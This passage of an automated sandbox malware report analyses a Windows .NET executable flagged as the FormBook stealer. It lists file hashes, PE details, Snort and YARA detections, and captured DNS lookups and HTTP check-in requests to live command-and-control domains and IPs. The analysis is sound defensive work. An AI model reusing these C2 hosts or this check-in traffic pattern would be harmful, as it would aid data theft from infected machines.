            PO - 04755 .bat.exeGet hashmaliciousFormBookBrowse
            • 103.224.182.242
            AMAZON-02UShttps://in.xero.com/otg9csffpxao6afkqb3xwrugoatdbpeduijycctcGet hashmaliciousUnknownBrowse
            • 34.252.40.201
            file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
            • 143.204.215.115
            qRNC6mtGhI.exeGet hashmaliciousFormBookBrowse
            • 3.64.163.50
            https://tg-pixel.gitbook.io/2Get hashmaliciousUnknownBrowse
            • 13.32.121.27
            O5XVFL6XD2.elfGet hashmaliciousMiraiBrowse
            • 13.253.0.127
            bolonetwork.arm7.elfGet hashmaliciousMirai, OkiruBrowse
            • 54.250.200.83
            https://securama.es/Get hashmaliciousUnknownBrowse
            • 13.33.187.70
            http://securama.esGet hashmaliciousUnknownBrowse
            • 13.33.187.70
            bolonetwork.x86.elfGet hashmaliciousMirai, OkiruBrowse
            • 54.212.28.245
            bolonetwork.arm.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
            • 13.56.37.32

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8tvMmyxveyzFcnJ.exe.log

            Download File
            Process:C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1216
            Entropy (8bit):5.34331486778365
            Encrypted:false
            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
            MD5:1330C80CAAC9A0FB172F202485E9B1E8
            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
            Malicious:true
            Reputation:high, very likely benign file
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Entropy (8bit):7.977023701616568
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            • Win32 Executable (generic) a (10002005/4) 49.75%
            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
            • Windows Screen Saver (13104/52) 0.07%
            • Generic Win/DOS Executable (2004/3) 0.01%
            File name:8tvMmyxveyzFcnJ.exe
            File size:574'976 bytes
            MD5:fff69b0890fc5c9c754e17d06deb5216
            SHA1:e3b4644bd7f114a830ec649edbed92a437a81673
            SHA256:a8fe32e805d1e0a0a61e2763308b01be24656f9bd356a863b174ce61e32d9a7e
            SHA512:a799abf32f8ede0cf805cff84961ded989b899ccfa44214ad17d4a9912ee650cac6f75b1462fbcc465b47397578eecb5f5998ee24c9694bfe2a7929549040088
            SSDEEP:12288:DHch5SCsLxfmoaaKB0eN3lvGIW4CO7MEMVbQsJeo6Bcd0Xp4e:zIfQHNKB0e9luIybQKXLd0m
            TLSH:A9C42344B7E8D786F96A9334029FAB010B353D4AE4AADE45DCE710D81D2BF405A92B37
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....eD...............0.............F.... ........@.. ....................... ............@................................

            File Icon

            Icon Hash:90cececece8e8eb0

            Static PE Info

            General

            Entrypoint:0x48db46
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Time Stamp:0xE84465C2 [Thu Jun 25 19:30:10 2093 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

            Entrypoint Preview

            Instruction
            jmp dword ptr [00402000h]
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x8daf40x4f.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x8e0000x5b4.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x900000xc.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x8c4500x70.text
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x20000x8bb4c0x8bc0014375216bc51e2d92f7b470c8cf1dfefFalse0.9766341262298748data7.982529796574812IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rsrc0x8e0000x5b40x60062081b28fd455e530dcb6e5a73f2dd7dFalse0.4303385416666667data4.115698753386909IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x900000xc0x200c9c1c03f94044dbfbf9a1c8b1edc6b75False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_VERSION0x8e0900x324data0.44154228855721395
            RT_MANIFEST0x8e3c40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

            Imports

            DLLImport
            mscoree.dll_CorExeMain

            Network Behavior

            Snort IDS Alerts

            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
            07/10/24-12:11:01.020125TCP2031412ET TROJAN FormBook CnC Checkin (GET)5063080192.168.2.43.64.163.50
            07/10/24-12:13:25.925017TCP2031412ET TROJAN FormBook CnC Checkin (GET)5063480192.168.2.4198.185.159.144
            07/10/24-12:11:21.261447TCP2031412ET TROJAN FormBook CnC Checkin (GET)5063180192.168.2.4103.224.212.213
            07/10/24-12:11:42.251746TCP2031412ET TROJAN FormBook CnC Checkin (GET)5063280192.168.2.4103.191.209.34
            07/10/24-12:10:40.094311TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.4188.114.97.3
            07/10/24-12:12:01.865030TCP2031412ET TROJAN FormBook CnC Checkin (GET)5063380192.168.2.43.33.130.190

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jul 10, 2024 12:10:40.088527918 CEST4974380192.168.2.4188.114.97.3
            Jul 10, 2024 12:10:40.094005108 CEST8049743188.114.97.3192.168.2.4
            Jul 10, 2024 12:10:40.094167948 CEST4974380192.168.2.4188.114.97.3
            Jul 10, 2024 12:10:40.094310999 CEST4974380192.168.2.4188.114.97.3
            Jul 10, 2024 12:10:40.099308968 CEST8049743188.114.97.3192.168.2.4
            Jul 10, 2024 12:10:40.595596075 CEST4974380192.168.2.4188.114.97.3
            Jul 10, 2024 12:10:40.601835012 CEST8049743188.114.97.3192.168.2.4
            Jul 10, 2024 12:10:40.601917028 CEST4974380192.168.2.4188.114.97.3
            Jul 10, 2024 12:11:01.015033960 CEST5063080192.168.2.43.64.163.50
            Jul 10, 2024 12:11:01.019965887 CEST80506303.64.163.50192.168.2.4
            Jul 10, 2024 12:11:01.020025015 CEST5063080192.168.2.43.64.163.50
            Jul 10, 2024 12:11:01.020124912 CEST5063080192.168.2.43.64.163.50
            Jul 10, 2024 12:11:01.025218010 CEST80506303.64.163.50192.168.2.4
            Jul 10, 2024 12:11:01.534713984 CEST5063080192.168.2.43.64.163.50
            Jul 10, 2024 12:11:02.000772953 CEST5063080192.168.2.43.64.163.50
            Jul 10, 2024 12:11:02.288122892 CEST80506303.64.163.50192.168.2.4
            Jul 10, 2024 12:11:02.288304090 CEST80506303.64.163.50192.168.2.4
            Jul 10, 2024 12:11:02.288310051 CEST80506303.64.163.50192.168.2.4
            Jul 10, 2024 12:11:02.288314104 CEST80506303.64.163.50192.168.2.4
            Jul 10, 2024 12:11:02.288407087 CEST5063080192.168.2.43.64.163.50
            Jul 10, 2024 12:11:02.288407087 CEST5063080192.168.2.43.64.163.50
            Jul 10, 2024 12:11:02.288407087 CEST5063080192.168.2.43.64.163.50
            Jul 10, 2024 12:11:02.288531065 CEST5063080192.168.2.43.64.163.50
            Jul 10, 2024 12:11:02.293514013 CEST80506303.64.163.50192.168.2.4
            Jul 10, 2024 12:11:02.293519974 CEST80506303.64.163.50192.168.2.4
            Jul 10, 2024 12:11:02.293586969 CEST5063080192.168.2.43.64.163.50
            Jul 10, 2024 12:11:02.293586969 CEST5063080192.168.2.43.64.163.50
            Jul 10, 2024 12:11:21.256373882 CEST5063180192.168.2.4103.224.212.213
            Jul 10, 2024 12:11:21.261297941 CEST8050631103.224.212.213192.168.2.4
            Jul 10, 2024 12:11:21.261368990 CEST5063180192.168.2.4103.224.212.213
            Jul 10, 2024 12:11:21.261446953 CEST5063180192.168.2.4103.224.212.213
            Jul 10, 2024 12:11:21.266251087 CEST8050631103.224.212.213192.168.2.4
            Jul 10, 2024 12:11:21.750828981 CEST5063180192.168.2.4103.224.212.213
            Jul 10, 2024 12:11:21.756529093 CEST8050631103.224.212.213192.168.2.4
            Jul 10, 2024 12:11:21.757118940 CEST5063180192.168.2.4103.224.212.213

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jul 10, 2024 12:09:40.065268040 CEST5841553192.168.2.41.1.1.1
            Jul 10, 2024 12:09:40.514588118 CEST53584151.1.1.1192.168.2.4
            Jul 10, 2024 12:09:59.876291037 CEST5972653192.168.2.41.1.1.1
            Jul 10, 2024 12:09:59.897070885 CEST53597261.1.1.1192.168.2.4
            Jul 10, 2024 12:10:40.050688982 CEST6269353192.168.2.41.1.1.1
            Jul 10, 2024 12:10:40.086332083 CEST53626931.1.1.1192.168.2.4
            Jul 10, 2024 12:11:00.504188061 CEST6161753192.168.2.41.1.1.1
            Jul 10, 2024 12:11:00.512017012 CEST53616171.1.1.1192.168.2.4
            Jul 10, 2024 12:11:20.923656940 CEST5884553192.168.2.41.1.1.1
            Jul 10, 2024 12:11:21.255609989 CEST53588451.1.1.1192.168.2.4
            Jul 10, 2024 12:11:41.376701117 CEST5761253192.168.2.41.1.1.1
            Jul 10, 2024 12:11:42.218935013 CEST53576121.1.1.1192.168.2.4
            Jul 10, 2024 12:12:01.830740929 CEST5137253192.168.2.41.1.1.1
            Jul 10, 2024 12:12:01.850331068 CEST53513721.1.1.1192.168.2.4
            Jul 10, 2024 12:12:22.373477936 CEST6365453192.168.2.41.1.1.1
            Jul 10, 2024 12:12:22.384119987 CEST53636541.1.1.1192.168.2.4
            Jul 10, 2024 12:12:42.857923031 CEST5543253192.168.2.41.1.1.1
            Jul 10, 2024 12:12:43.862828016 CEST5543253192.168.2.41.1.1.1
            Jul 10, 2024 12:12:44.877207994 CEST5543253192.168.2.41.1.1.1
            Jul 10, 2024 12:12:46.902784109 CEST5543253192.168.2.41.1.1.1
            Jul 10, 2024 12:12:48.722023964 CEST53554321.1.1.1192.168.2.4
            Jul 10, 2024 12:12:48.722038984 CEST53554321.1.1.1192.168.2.4
            Jul 10, 2024 12:12:48.722381115 CEST53554321.1.1.1192.168.2.4
            Jul 10, 2024 12:12:48.723553896 CEST53554321.1.1.1192.168.2.4
            Jul 10, 2024 12:13:03.397139072 CEST5325953192.168.2.41.1.1.1
            Jul 10, 2024 12:13:03.408982038 CEST53532591.1.1.1192.168.2.4
            Jul 10, 2024 12:13:25.860891104 CEST6541353192.168.2.41.1.1.1
            Jul 10, 2024 12:13:25.919226885 CEST53654131.1.1.1192.168.2.4

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Jul 10, 2024 12:09:40.065268040 CEST192.168.2.41.1.1.10xd319Standard query (0)www.basedawgz.liveA (IP address)IN (0x0001)false
            Jul 10, 2024 12:09:59.876291037 CEST192.168.2.41.1.1.10xb570Standard query (0)www.thecollisionmagazine.comA (IP address)IN (0x0001)false
            Jul 10, 2024 12:10:40.050688982 CEST192.168.2.41.1.1.10x390bStandard query (0)www.291van.funA (IP address)IN (0x0001)false
            Jul 10, 2024 12:11:00.504188061 CEST192.168.2.41.1.1.10x5badStandard query (0)www.motolimod.comA (IP address)IN (0x0001)false
            Jul 10, 2024 12:11:20.923656940 CEST192.168.2.41.1.1.10x9fabStandard query (0)www.at89v2.comA (IP address)IN (0x0001)false
            Jul 10, 2024 12:11:41.376701117 CEST192.168.2.41.1.1.10x1b7bStandard query (0)www.sainikshiksha.comA (IP address)IN (0x0001)false
            Jul 10, 2024 12:12:01.830740929 CEST192.168.2.41.1.1.10x3212Standard query (0)www.fondsa.xyzA (IP address)IN (0x0001)false
            Jul 10, 2024 12:12:22.373477936 CEST192.168.2.41.1.1.10xd729Standard query (0)www.huttonsidel.onlineA (IP address)IN (0x0001)false
            Jul 10, 2024 12:12:42.857923031 CEST192.168.2.41.1.1.10x3e9eStandard query (0)www.llngx.comA (IP address)IN (0x0001)false
            Jul 10, 2024 12:12:43.862828016 CEST192.168.2.41.1.1.10x3e9eStandard query (0)www.llngx.comA (IP address)IN (0x0001)false
            Jul 10, 2024 12:12:44.877207994 CEST192.168.2.41.1.1.10x3e9eStandard query (0)www.llngx.comA (IP address)IN (0x0001)false
            Jul 10, 2024 12:12:46.902784109 CEST192.168.2.41.1.1.10x3e9eStandard query (0)www.llngx.comA (IP address)IN (0x0001)false
            Jul 10, 2024 12:13:03.397139072 CEST192.168.2.41.1.1.10xa372Standard query (0)www.ajansyapai.netA (IP address)IN (0x0001)false
            Jul 10, 2024 12:13:25.860891104 CEST192.168.2.41.1.1.10x1d62Standard query (0)www.tatesfluffyfrenchies.comA (IP address)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Jul 10, 2024 12:09:40.514588118 CEST1.1.1.1192.168.2.40xd319Name error (3)www.basedawgz.livenonenoneA (IP address)IN (0x0001)false
            Jul 10, 2024 12:09:59.897070885 CEST1.1.1.1192.168.2.40xb570Name error (3)www.thecollisionmagazine.comnonenoneA (IP address)IN (0x0001)false
            Jul 10, 2024 12:10:40.086332083 CEST1.1.1.1192.168.2.40x390bNo error (0)www.291van.fun188.114.97.3A (IP address)IN (0x0001)false
            Jul 10, 2024 12:10:40.086332083 CEST1.1.1.1192.168.2.40x390bNo error (0)www.291van.fun188.114.96.3A (IP address)IN (0x0001)false
            Jul 10, 2024 12:11:21.255609989 CEST1.1.1.1192.168.2.40x9fabNo error (0)www.at89v2.com103.224.212.213A (IP address)IN (0x0001)false
            Jul 10, 2024 12:11:42.218935013 CEST1.1.1.1192.168.2.40x1b7bNo error (0)www.sainikshiksha.comsainikshiksha.comCNAME (Canonical name)IN (0x0001)false
            Jul 10, 2024 12:11:42.218935013 CEST1.1.1.1192.168.2.40x1b7bNo error (0)sainikshiksha.com103.191.209.34A (IP address)IN (0x0001)false
            Jul 10, 2024 12:12:01.850331068 CEST1.1.1.1192.168.2.40x3212No error (0)www.fondsa.xyzfondsa.xyzCNAME (Canonical name)IN (0x0001)false
            Jul 10, 2024 12:12:01.850331068 CEST1.1.1.1192.168.2.40x3212No error (0)fondsa.xyz3.33.130.190A (IP address)IN (0x0001)false
            Jul 10, 2024 12:12:01.850331068 CEST1.1.1.1192.168.2.40x3212No error (0)fondsa.xyz15.197.148.33A (IP address)IN (0x0001)false
            Jul 10, 2024 12:12:22.384119987 CEST1.1.1.1192.168.2.40xd729Name error (3)www.huttonsidel.onlinenonenoneA (IP address)IN (0x0001)false
            Jul 10, 2024 12:12:48.722023964 CEST1.1.1.1192.168.2.40x3e9eServer failure (2)www.llngx.comnonenoneA (IP address)IN (0x0001)false
            Jul 10, 2024 12:12:48.722038984 CEST1.1.1.1192.168.2.40x3e9eServer failure (2)www.llngx.comnonenoneA (IP address)IN (0x0001)false
            Jul 10, 2024 12:12:48.722381115 CEST1.1.1.1192.168.2.40x3e9eServer failure (2)www.llngx.comnonenoneA (IP address)IN (0x0001)false
            Jul 10, 2024 12:12:48.723553896 CEST1.1.1.1192.168.2.40x3e9eServer failure (2)www.llngx.comnonenoneA (IP address)IN (0x0001)false
            Jul 10, 2024 12:13:03.408982038 CEST1.1.1.1192.168.2.40xa372Name error (3)www.ajansyapai.netnonenoneA (IP address)IN (0x0001)false
            Jul 10, 2024 12:13:25.919226885 CEST1.1.1.1192.168.2.40x1d62No error (0)www.tatesfluffyfrenchies.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)false
            Jul 10, 2024 12:13:25.919226885 CEST1.1.1.1192.168.2.40x1d62No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)false
            Jul 10, 2024 12:13:25.919226885 CEST1.1.1.1192.168.2.40x1d62No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)false
            Jul 10, 2024 12:13:25.919226885 CEST1.1.1.1192.168.2.40x1d62No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)false
            Jul 10, 2024 12:13:25.919226885 CEST1.1.1.1192.168.2.40x1d62No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)false

            HTTP Request Dependency Graph

            • www.291van.fun
            • www.motolimod.com
            • www.at89v2.com

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.449743188.114.97.3802580C:\Windows\explorer.exe
            TimestampBytes transferredDirectionData
            Jul 10, 2024 12:10:40.094310999 CEST155OUTGET /mc10/?M6=0jqVw3fXhgUe9S01oU54GSyQct+tyOMGPM4Q+l1hxxFHWjnqq7dqR8wNeV12RES6q9dV&sZ=Ynzp6xUh HTTP/1.1
            Host: www.291van.fun
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.4506303.64.163.50802580C:\Windows\explorer.exe
            TimestampBytes transferredDirectionData
            Jul 10, 2024 12:11:01.020124912 CEST158OUTGET /mc10/?M6=vFB2baQv3F/rJ4Poxnbh3E5xW9PPAAbphga1xIFZj8yJGRkxzOANKPapIG+pOmwhUo5D&sZ=Ynzp6xUh HTTP/1.1
            Host: www.motolimod.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
            Jul 10, 2024 12:11:02.288122892 CEST291INHTTP/1.1 410 Gone
            Server: openresty
            Date: Wed, 10 Jul 2024 10:11:01 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 64 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 74 6f 6c 69 6d 6f 64 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 7<html>9 <head>4d <meta http-equiv='refresh' content='0; url=http://www.motolimod.com/' />a </head>8</html>0
            Jul 10, 2024 12:11:02.288314104 CEST291INHTTP/1.1 410 Gone
            Server: openresty
            Date: Wed, 10 Jul 2024 10:11:01 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 64 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 74 6f 6c 69 6d 6f 64 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 7<html>9 <head>4d <meta http-equiv='refresh' content='0; url=http://www.motolimod.com/' />a </head>8</html>0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.450631103.224.212.213802580C:\Windows\explorer.exe
            TimestampBytes transferredDirectionData
            Jul 10, 2024 12:11:21.261446953 CEST155OUTGET /mc10/?M6=+PshiMmsD3s2EuJ9KF3baeU+rJnvgbutDGTUYWD/T/xNi6HtTgrR7YeDwlLM6QRR03T9&sZ=Ynzp6xUh HTTP/1.1
            Host: www.at89v2.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:06:08:59
            Start date:10/07/2024
            Path:C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
            Imagebase:0x7a0000
            File size:574'976 bytes
            MD5 hash:FFF69B0890FC5C9C754E17D06DEB5216
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:low
            Has exited:true

            General

            Target ID:2
            Start time:06:09:02
            Start date:10/07/2024
            Path:C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
            Imagebase:0x180000
            File size:574'976 bytes
            MD5 hash:FFF69B0890FC5C9C754E17D06DEB5216
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            General

            Target ID:3
            Start time:06:09:02
            Start date:10/07/2024
            Path:C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
            Imagebase:0x850000
            File size:574'976 bytes
            MD5 hash:FFF69B0890FC5C9C754E17D06DEB5216
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:low
            Has exited:true

            General

            Target ID:4
            Start time:06:09:02
            Start date:10/07/2024
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\Explorer.EXE
            Imagebase:0x7ff72b770000
            File size:5'141'208 bytes
            MD5 hash:662F4F92FDE3557E86D110526BB578D5
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000004.00000002.4157684455.000000000F8A5000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            Reputation:high
            Has exited:false

            General

            Target ID:5
            Start time:06:09:05
            Start date:10/07/2024
            Path:C:\Windows\SysWOW64\autofmt.exe
